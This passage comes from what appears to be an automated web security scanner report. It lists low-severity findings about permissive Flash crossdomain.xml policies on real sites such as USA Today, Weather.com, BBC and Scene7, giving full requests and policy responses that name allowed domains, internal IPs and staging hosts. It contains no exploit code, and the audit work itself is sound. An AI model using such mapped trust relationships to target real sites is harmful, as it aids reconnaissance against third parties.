<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.66. http://i.usatoday.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://i.usatoday.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: i.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:48 GMT
ETag: "0f8ee1317e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 16 May 2011 01:19:46 GMT
Content-Length: 1558
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

6.67. http://images.scanalert.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://images.scanalert.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: images.scanalert.com

Response

HTTP/1.0 200 OK
Server: McAfeeSecure
ETag: "EKdW2Rg2Poz"
Last-Modified: Wed, 03 Sep 2008 18:43:59 GMT
Accept-Ranges: bytes
Content-Type: text/xml; charset=utf-8
Content-Length: 116
Date: Mon, 16 May 2011 01:39:43 GMT
Connection: close
Cache-Control: private

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.scanalert.com"/>
</cross-domain-policy>

6.68. http://imawow.weather.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imawow.weather.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: imawow.weather.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:19:59 GMT
Server: Apache
SVRNAME: web1x11
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2057
Keep-Alive: timeout=1, max=7387
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.weather.com" />
<allow-access-from domain="*.epicmashup.com" />
<allow-access-from domain="showcase.weather.com" />
<allow-access-from domain="*.chumby.com" />
<allow-access-from domain="*.imwx.com" />
<allow-access-from domain="*.rga.com" />
<allow-access-from domain="*.jnj.com" />

<allow-access-from domain="*.zyrtec.com" />
<allow-access-from domain="*.amazonaws.com" />
<allow-access-from domain="*.gigyahosting.com" />
<allow-access-from domain="*.gigyahosting1.com" />
<allow-access-from domain="media.pointroll.com" />
<allow-access-from domain="www.pointroll.com" />
<allow-access-from domain="data.pointroll.com" />
<allow-access-from domain="speed.pointroll.com" />
<allow-access-from domain="mirror.pointroll.com" />
<allow-access-from domain="adportal.pointroll.com" />
<allow-access-from domain="*.ge.com" />
<allow-access-from domain="*.inbcu.com" />
<allow-access-from domain="widgets.nbcuni.com" />
<allow-access-from domain="*.ivillage.com" />
<allow-access-from domain="devworks.ivillage.com" />
<allow-access-from domain="devi.ivillage.com" />
<allow-access-from domain="i.ivillage.com" />
<allow-access-from domain="www.ivillage.com" />
<allow-access-from domain="msnbcmedia.msn.com" />
<allow-access-from domain="*.tvpdigital.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="apps.eyewonderlabs.com" />
<allow-access-from domain="*.eyewonder.com" />
<allow-access-from domain="fjpecvaa.joyent.us" />
<allow-access-from domain="widget.bravotv.com" />
<allow-access-from domain="*.jwtdev.com" />
<allow-access-from domain="*.jwtweb.com" />
<allow-access-from domain="*.na.jnj.com" />
<allow-access-from domain="*2mdn.net" />
<allow-access-from domain="*.googlesyndication.com" />
...[SNIP]...

6.69. http://login.dotomi.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://login.dotomi.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: login.dotomi.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:38:30 GMT
Server: Apache
X-Name: dmc-o01
Last-Modified: Tue, 23 Nov 2010 00:49:00 GMT
ETag: "3500060-a1-495adbd05d700"
Accept-Ranges: bytes
Content-Length: 161
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*.dotomi.com" />
</cross-domain-policy>

6.70. http://newsrss.bbc.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://newsrss.bbc.co.uk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Sun, 15 May 2011 21:21:03 GMT
Date: Sun, 15 May 2011 21:19:03 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

6.71. http://optimized-by.rubiconproject.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:21:49 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

6.72. http://pagead2.googlesyndication.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pagead2.googlesyndication.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 15 May 2011 11:30:02 GMT
Expires: Mon, 16 May 2011 11:30:02 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 49790
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.73. http://pubads.g.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pubads.g.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 15 May 2011 03:47:21 GMT
Expires: Mon, 16 May 2011 03:47:21 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 77543
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.74. http://s7d5.scene7.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s7d5.scene7.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
ETag: W/"25343-1305036218000"
Accept-Ranges: bytes
Last-Modified: Tue, 10 May 2011 14:03:38 GMT
Content-Type: application/xml
Content-Length: 25343
Expires: Mon, 16 May 2011 05:25:36 GMT
Date: Mon, 16 May 2011 01:35:52 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.laneventure.com"/>
<allow-access-from domain="*.pearsonco.com"/>
<allow-access-from domain="*.targetimg1.com"/>
<allow-access-from domain="*.targetimg2.com"/>
<allow-access-from domain="*.targetimg3.com"/>
<allow-access-from domain="*.agilent.com"/>
<allow-access-from domain="*.artvan.com"/>
<allow-access-from domain="*.mizunogolf.com"/>
<allow-access-from domain="*.talbots.com"/>
<allow-access-from domain="giftadvisor.indelible.tv"/>
<allow-access-from domain="*.taaz.com"/>
<allow-access-from domain="www.flashmaxx.com"/>
<allow-access-from domain="flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.armstrong.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="sassomedia.com"/>
<allow-access-from domain="*.photoshop.com"/>
<allow-access-from domain="kijones.host.adobe.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="*.trex.com"/>
<allow-access-from domain="*.trexco.com"/>
<allow-access-from domain="*.vermontcountrystore.com"/>
<allow-access-from domain="*.pabng.com"/>
<allow-access-from domain="s7sps3.scene7.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.k2admin.com"/>
<allow-access-from domain="*.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.shopdeluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.nimblefish.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fossil.com"/>
<allow-access-from domain="www.michele.com"/>
<allow-access-from domain="127.0.0.1" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.polarisindustries.com"/>
<allow-access-from domain="backstage.polarisindustries.com"/>
<allow-access-from domain="s7diod-isorigin.scene7.com"/>
<allow-access-from domain="origin-na1.scene7.com"/>
<allow-access-from domain="origin-na2.scene7.com"/>
<allow-access-from domain="origin-na3.scene7.com"/>
<allow-access-from domain="origin-na4.scene7.com"/>
<allow-access-from domain="origin-na5.scene7.com"/>
<allow-access-from domain="origin-na6.scene7.com"/>
<allow-access-from domain="origin-na7.scene7.com"/>
<allow-access-from domain="origin-na8.scene7.com"/>
<allow-access-from domain="s7d1.scene7.com"/>
<allow-access-from domain="s7d2.scene7.com"/>
<allow-access-from domain="s7d3.scene7.com"/>
<allow-access-from domain="s7d4.scene7.com"/>
<allow-access-from domain="s7ondemand1.scene7.com"/>
<allow-access-from domain="irtex1.scene7.com"/>
<allow-access-from domain="10.80.1.144"/>
<allow-access-from domain="10.80.1.152"/>
<allow-access-from domain="10.80.1.42"/>
<allow-access-from domain="origin-apps.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps.scene7.com"/>
<allow-access-from domain="isstaging.scene7.com"/>
<allow-access-from domain="techservices.scene7.com"/>
<allow-access-from domain="ecomtest1.hancockms.com"/>
<allow-access-from domain="www.hancockfabrics.com"/>
<allow-access-from domain="www.eddiebauer.com"/>
<allow-access-from domain="dev.eddiebauer.com"/>
<allow-access-from domain="qa.eddiebauer.com"/>
<allow-access-from domain="testvipd1.scene7.com"/>
<allow-access-from domain="testvipd2.scene7.com"/>
<allow-access-from domain="testvipd3.scene7.com"/>
<allow-access-from domain="testvipd4.scene7.com"/>
<allow-access-from domain="s7ondemand3.scene7.com"/>
<allow-access-from domain="s7ondemand7.scene7.com"/>
<allow-access-from domain="s7ips1.scene7.com"/>
<allow-access-from domain="s7ondemand5.scene7.com"/>
<allow-access-from domain="*.sample.scene7.com"/>
<allow-access-from domain="origin-search.scene7.com"/>
<allow-access-from domain="staging.scene7.com"/>
<allow-access-from domain="s7testis.adobe.com"/>
<allow-access-from domain="sportstown.crosscomm.net"/>
<allow-access-from domain="sportstown.com"/>
<allow-access-from domain="*.sportstown.com"/>
<allow-access-from domain="www.anthropologie.com"/>
<allow-access-from domain="staging.anthropologie.us"/>
<allow-access-from domain="smartwool.dev.summitprojects.com"/>
<allow-access-from domain="smartwool.stage.summitprojects.com"/>
<allow-access-from domain="www.smartwool.com"/>
...[SNIP]...
<allow-access-from domain="testvipd5.scene7.com"/>
<allow-access-from domain="www.roadrunnersports.com"/>
<allow-access-from domain="dev.atgnow.com"/>
<allow-access-from domain="staging.roadrunnersports.com"/>
<allow-access-from domain="*.sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain=" s7.sears.com "/>
<allow-access-from domain="*.myctmh.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.instrum3nt.com"/>
<allow-access-from domain="*.tommybahama.com"/>
<allow-access-from domain="demo.ml.nurun.com"/>
<allow-access-from domain="trek07.hansondodge.com"/>
<allow-access-from domain="*.dexdealer.com" />
<allow-access-from domain="*.bontrager.com" />
<allow-access-from domain="*.trekbikes.com" />
<allow-access-from domain="*.readyfortheroadahead.com" />
<allow-access-from domain="*.belk.com"/>
<allow-access-from domain="*.sears.com"/>
<allow-access-from domain="*.dayport.com"/>
<allow-access-from domain="eaqa2prod1234.ethanallen.com"/>
<allow-access-from domain="devaws.ethanallen.com"/>
<allow-access-from domain="elm.kharv.com"/>
<allow-access-from domain="serotoninsoftware.com"/>
<allow-access-from domain="*.ethanallen.com"/>
<allow-access-from domain="*.wishbook.com"/>
<allow-access-from domain="*.entriq.net"/>
<allow-access-from domain="test-web1-www.lbiatlanta.com"/>
<allow-access-from domain="*.newellco.com"/>
<allow-access-from domain="preview.graco.com"/>
<allow-access-from domain="*.gracobaby.com"/>
<allow-access-from domain="s.sears.com"/>
<allow-access-from domain="202.44.56.2"/>
<allow-access-from domain="202.44.58.2"/>
<allow-access-from domain="beta.graco.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.ashleyfurniture.com" />
<allow-access-from domain="*.ashleyfurniturehomestore.com" />
<allow-access-from domain="s7sps1-staging.scene7.com" />
<allow-access-from domain="s7sps1.scene7.com" />
<allow-access-from domain="*.lokion.com"/>
<allow-access-from domain="*.vikingrange.com"/>
<allow-access-from domain="www.armstrong.com"/>
<allow-access-from domain="*.classscene.com"/>
<allow-access-from domain="*.classsceneqa.com"/>
<allow-access-from domain="*.classscenedemo.com"/>
<allow-access-from domain="*.fulltiltboots.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.karhuskico.com"/>
<allow-access-from domain="*.k2women.com"/>
<allow-access-from domain="*.k2snowboarding.com"/>
<allow-access-from domain="*.k2skis.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.lineskis.com"/>
<allow-access-from domain="*.5150snowboarding.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.atlassnowshoe.com"/>
<allow-access-from domain="*.tubbssnowshoes.com"/>
<allow-access-from domain="*.k2telemark.com"/>
<allow-access-from domain="*.k2dealertools.com"/>
<allow-access-from domain="*.planet-earth-clothing.com"/>
<allow-access-from domain="*.k2skates.com"/>
<allow-access-from domain="*.k2iceskates.com"/>
<allow-access-from domain="*.snowshoes.com"/>
<allow-access-from domain="*.vashonstorefront.com"/>
<allow-access-from domain="*.adiofootwear.com"/>
<allow-access-from domain="*.adio.com"/>
<allow-access-from domain="4.59.112.138"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.store.americangirl.com"/>
<allow-access-from domain="agpmt-prod:7778"/>
<allow-access-from domain="agpmt-test:7777"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="*.jcpenney.com"/>
<allow-access-from domain="*.teamzonesports.com"/>
<allow-access-from domain="*.underarmour.com"/>
<allow-access-from domain="broadridge.mominc.com"/>
<allow-access-from domain="*.craftsman.com"/>
<allow-access-from domain="*.sothebys.com"/>
<allow-access-from domain="*.facebook.com"/>
<allow-access-from domain="*.thuzi.com"/>
<allow-access-from domain="*.samsclub.com"/>
<allow-access-from domain="161.169.79.10"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.hansondodge.com"/>
<allow-access-from domain="*.thebrick.com"/>
<allow-access-from domain="s7demo.scene7.com"/>
<allow-access-from domain="*.richrelevance.com"/>
<allow-access-from domain="*.hit.homedepot.resource.com"/>
<allow-access-from domain="*.allurent.net"/>
<allow-access-from domain="*.ashro.com"/>
<allow-access-from domain="*.countrydoor.com"/>
<allow-access-from domain="*.ginnys.com"/>
<allow-access-from domain="*.grandpointe.com"/>
<allow-access-from domain="*.monroeandmain.com"/>
<allow-access-from domain="*.midnightvelvet.com"/>
<allow-access-from domain="*.raceteamgear.com"/>
<allow-access-from domain="*.swisscolony.com"/>
<allow-access-from domain="*.seventhavenue.com"/>
<allow-access-from domain="*.homevisions.com"/>
<allow-access-from domain="*.wards.com"/>
<allow-access-from domain="*.tenderfilet.com"/>
<allow-access-from domain="assets.k2sports.com"/>
<allow-access-from domain="assets.ridesnowboards.com"/>
<allow-access-from domain="assets1.k2sports.com"/>
<allow-access-from domain="assets1.ridesnowboards.com"/>
<allow-access-from domain="assets2.k2sports.com"/>
<allow-access-from domain="assets2.ridesnowboards.com"/>
<allow-access-from domain="161.211.2.28"/>
<allow-access-from domain="161.211.155.7"/>
<allow-access-from domain="ah-stg.fry.com"/>
<allow-access-from domain="cd-stg.fry.com"/>
<allow-access-from domain="gn-stg.fry.com"/>
<allow-access-from domain="gp-stg.fry.com"/>
<allow-access-from domain="hv-stg.fry.com"/>
<allow-access-from domain="mm-stg.fry.com"/>
<allow-access-from domain="mv-stg.fry.com"/>
<allow-access-from domain="mw-stg.fry.com"/>
<allow-access-from domain="rt-stg.fry.com"/>
<allow-access-from domain="rc-stg.fry.com"/>
<allow-access-from domain="tf-stg.fry.com"/>
<allow-access-from domain="sc-stg.fry.com"/>
<allow-access-from domain="sa-stg.fry.com"/>
<allow-access-from domain="shopdeluxe-v9-dev.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="shopdeluxe-v9-uat.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="stage.coach.com"/>
<allow-access-from domain="*.coach.com"/>
<allow-access-from domain="demandware.edgesuite.net"/>
<allow-access-from domain="*.buildabear.com"/>
<allow-access-from domain="*.babwtest.com"/>
<allow-access-from domain="customshop.mesfire.com"/>
<allow-access-from domain="stage.homeinspiration.homedepot.com "/>
<allow-access-from domain="homeinspiration.homedepot.com"/>
<allow-access-from domain="pointroll.com"/>
<allow-access-from domain="*.pointroll.com"/>
<allow-access-from domain="*.smartwool.com"/>
<allow-access-from domain="*.summitprojects.com"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="511.niteviewtech.com"/>
<allow-access-from domain="www.lauramercier.com"/>
<allow-access-from domain="*.lumberliquidators.com"/>
<allow-access-from domain="*.ae.com"/>
<allow-access-from domain="*.aezone.com"/>
<allow-access-from domain="s7everest.macromedia.com"/>
<allow-access-from domain="s7fuji.macromedia.com"/>
<allow-access-from domain="s7qa-is.macromedia.com"/>
<allow-access-from domain="officemax.companychecksandforms.com"/>
<allow-access-from domain="www.511deasbf.com"/>
<allow-access-from domain="*.511deasbf.com"/>
<allow-access-from domain="*.vcfcorp.com"/>
...[SNIP]...
<allow-access-from domain="*.asfurniture.com"/>
<allow-access-from domain="*.vcf.com"/>
...[SNIP]...
<allow-access-from domain="anthropologie.uat.venda.com"/>
<allow-access-from domain="anthropologie.live.venda.com"/>
<allow-access-from domain="*.511academy.com"/>
<allow-access-from domain="*.reedkrakoff.com"/>
<allow-access-from domain="stage.wearport.com"/>
<allow-access-from domain="*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.anthropologie.eu"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="www.leadbased.com"/>
<allow-access-from domain="*.mxbi.com"/>
<allow-access-from domain="*.jordans.com"/>
<allow-access-from domain="jordans.com"/>
<allow-access-from domain="jordansqa.weymouthdesign.com"/>
<allow-access-from domain="*.mercury.com"/>
<allow-access-from domain="*.cb2.com"/>
<allow-access-from domain="*.landofnod.com"/>
<allow-access-from domain="*.crateandbarrel.com"/>
<allow-access-from domain="*.crateandbarrel.ca"/>
<allow-access-from domain="cim-dev.deluxe.com"/>
<allow-access-from domain="cim-qa.deluxe.com"/>
<allow-access-from domain="www.deluxe-check-order.com"/>
<allow-access-from domain="wwwpreprod.deluxe-check-order.com"/>
<allow-access-from domain="*.vfimagewear.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.zumiez.com"/>
<allow-access-from domain="zumiez.com"/>
<allow-access-from domain="*.vfc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="service-apps.scene7.com"/>
<allow-access-from domain="service-apps-staging.scene7.com"/>
<allow-access-from domain="walmart.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps-staging.scene7.com"/>
<allow-access-from domain="63.241.188.118"/>
<allow-access-from domain="63.241.188.119"/>
<allow-access-from domain="63.241.188.116"/>
<allow-access-from domain="63.241.188.120"/>
<allow-access-from domain="63.241.188.121"/>
